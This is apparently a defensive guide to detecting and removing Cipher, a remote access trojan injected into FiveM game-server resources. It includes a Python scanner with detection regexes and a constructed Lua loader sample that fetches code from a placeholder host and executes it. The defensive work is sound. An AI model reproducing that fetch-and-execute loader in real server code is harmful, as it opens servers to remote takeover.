This article covers Cipher, a known piece of malware found in FiveM servers. Cipher is a Remote Access Trojan (RAT) sold as a service: its customers generate a short Lua loader (typically just four lines) and inject it into a server resource. The loader is usually obfuscated to make it hard to read, and its only job is to download additional malicious code from servers controlled by the attackers.
Servers compromised by Cipher can be exploited for various malicious purposes, including:
- Cryptocurrency Mining: Cipher can install software that secretly uses your server’s processing power (CPU) to mine cryptocurrency for the attacker. This can significantly slow down your server’s performance.
- Administrator Password Change: Attackers might use Cipher to change your administrator password, potentially locking you out of your own server.
- Direct Remote Control: Cipher can grant the attacker complete remote control over your server, allowing them to perform any actions they desire.
- FiveM Resource Paid Asset Theft: Cipher could be used to steal valuable paid resource assets from your Cfx.re account and transfer them to another account.
- Data Theft: Cipher can steal sensitive data from your server, such as login credentials or browsing history.
There are multiple ways to detect Cipher on your server.
By checking the local user accounts on your server (Windows hosts)
- Click the Start menu and search for “Computer Management.”
- Once Computer Management opens, navigate to Local Users and Groups > Users. This displays the user accounts on your server.
- If you see a user account named “Moda”, it’s possible your machine has been compromised by Cipher. Treat any account you did not create the same way, whatever its name.
By using Visual Studio Code’s search feature
- Open your server’s resource folder in Visual Studio Code.
- Click the search icon in Visual Studio Code. It typically looks like a magnifying glass icon.
- Search, one at a time, for the indicator strings listed in these write-ups (link titles as they appear):
  - cipher/chapters/chapter-1-payload.md at main · ericstolly/cipher · GitHub
  - cipher/chapters/chapter-2-infection.md at main · ericstolly/cipher · GitHub
  - Cipher-Panel/Documentation/How-It-Works.md at main · ProjecteEndCipher/Cipher-Panel · GitHub
- For each search, Visual Studio Code will list every file within your server’s resource folder that contains matching text.
- If any files are found, proceed with caution and thoroughly analyze them before deleting. The injected lines are often appended to an otherwise legitimate file or added as extra entries in a resource’s fxmanifest, so compare the hit against what the resource is supposed to contain rather than deleting the whole resource blindly.
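The manual search above can be scripted. The scanner below is an added example, not code from this article or from any of the linked projects. It assumes two things: the literal indicator strings come from the caller (take them from the write-ups linked above; the example passes only a placeholder), and the regex heuristics describe the generic “fetch a URL, then execute the response” shape the article attributes to the loader, plus long runs of escaped bytes typical of obfuscated Lua. Those heuristics are assumptions for illustration, not Cipher-specific signatures. The sample resource tree it scans is constructed inline; the host name is the reserved example.invalid, not a real command server.

```python
"""Scan a FiveM resource tree for an injected remote-code loader.

Added example, not code from the article or from any linked project.
Assumptions: the caller supplies the literal indicator strings (take them from
the linked write-ups); the regex heuristics below describe the generic
"fetch a URL, then execute the response" shape the article attributes to the
loader and are not Cipher-specific signatures.
"""
import re
import tempfile
from pathlib import Path

MANIFEST_NAMES = ("fxmanifest.lua", "__resource.lua")

# Assumed heuristics: a FiveM HTTP native plus a dynamic Lua code loader.
FETCH_RE = re.compile(r"\bPerformHttpRequest\s*\(")
EXEC_RE = re.compile(r"\b(?:load|loadstring)\s*\(")
# Eight or more consecutive decimal or hex string escapes: string-packed code.
PACKED_RE = re.compile(r"(?:\\\d{1,3}){8,}|(?:\\x[0-9a-fA-F]{2}){8,}")


def manifest_server_scripts(text: str) -> list[str]:
    """Return every file named by server_script / server_scripts in a manifest."""
    names: list[str] = []
    pattern = r"\bserver_scripts?\s*(\{[^}]*\}|\(?\s*['\"][^'\"]+['\"]\)?)"
    for m in re.finditer(pattern, text):
        names.extend(re.findall(r"['\"]([^'\"]+)['\"]", m.group(1)))
    return names


def scan_lua(rel: str, text: str, literals: list[str]) -> list[str]:
    """Apply the literal indicators and the generic heuristics to one file."""
    out: list[str] = []
    for s in literals:
        if s in text:
            out.append(f"{rel}: contains literal indicator {s!r}")
    if FETCH_RE.search(text) and EXEC_RE.search(text):
        out.append(f"{rel}: fetches a URL and executes the response (remote-loader pattern)")
    if PACKED_RE.search(text):
        out.append(f"{rel}: long run of escaped bytes (possibly obfuscated payload)")
    return out


def scan_resources(root: Path, literals: list[str]) -> list[str]:
    """Walk a resources folder; report manifest oddities and suspicious Lua."""
    findings: list[str] = []
    for manifest in sorted(p for p in root.rglob("*") if p.name in MANIFEST_NAMES):
        text = manifest.read_text(encoding="utf-8", errors="replace")
        for entry in manifest_server_scripts(text):
            # Sanity check only: a declared script that does not exist is worth a look.
            if "*" not in entry and not (manifest.parent / entry).exists():
                rel = manifest.relative_to(root).as_posix()
                findings.append(f"{rel}: server script {entry!r} is declared but missing")
    for lua in sorted(root.rglob("*.lua")):
        text = lua.read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_lua(lua.relative_to(root).as_posix(), text, literals))
    return findings


def build_sample(base: Path) -> Path:
    """Write a constructed resource tree (not real malware) to demo the scanner."""
    res = base / "resources" / "example-shop"
    (res / "server").mkdir(parents=True)
    (res / "fxmanifest.lua").write_text(
        "fx_version 'cerulean'\ngame 'gta5'\n"
        "server_scripts { 'server/main.lua', 'server/ui.lua', 'server/helper.lua' }\n",
        encoding="utf-8",
    )
    (res / "server" / "main.lua").write_text(
        "RegisterNetEvent('shop:buy')\n"
        "AddEventHandler('shop:buy', function(item) print(item) end)\n",
        encoding="utf-8",
    )
    # Constructed loader with the shape the article describes; the host name is
    # the reserved example.invalid, not a real command server.
    (res / "server" / "ui.lua").write_text(
        'local k = "\\104\\101\\108\\108\\111\\119\\111\\114\\108\\100"\n'
        "local u = 'http://example.invalid/' .. k\n"
        "PerformHttpRequest(u, function(c, b) if c == 200 then load(b)() end end)\n",
        encoding="utf-8",
    )
    return base / "resources"


def demo() -> list[str]:
    """Build the sample tree in a temp dir and scan it with one literal indicator."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample(Path(tmp))
        return scan_resources(root, ["example.invalid"])


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a real server with `scan_resources(Path("resources"), [...])`, passing the indicator strings from the write-ups above. The heuristics will also flag legitimate resources that fetch and run remote code on purpose, so every hit still needs a manual look, as the step above says.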
By running open-source scanners
- CipherScanner (GitHub: Szpachlan/CipherScanner)
- FiveMCipherFinder (PyPI: FiveMCipherFinder)
Removing the injected Lua is not enough on its own: Cipher can give the attacker full remote control of the host and can change the administrator password, so it’s recommended to rebuild or reinstall your server from a known-good source after removing all malicious injected code, and to change every credential that was stored on or used from the server.
More References:
- ProjecteEndCipher/Cipher-Panel (GitHub): Cipher is a paid Remote Execution/Administration Tool (RAT). Cipher's customers generate 4 lines of Lua code to inject into resources (many of them obfuscate the code), which will download remote code from the Cipher servers. We've found many leaked resources are infected with Cipher-Panel. This repository will talk more about how Cipher works.
- ericstolly/cipher (GitHub): A complete reverse-engineered breakdown of the malicious software for hire targeting FiveM servers called Cipher-Panel.
- Virus in server files (Cfx.re Community, Server Discussion)
- Random Added Local Code & Random server_scripts in fxmanifest (Cfx.re Community, Server Discussion)
- A weird line gets added to some resources (Cfx.re Community, Discussion)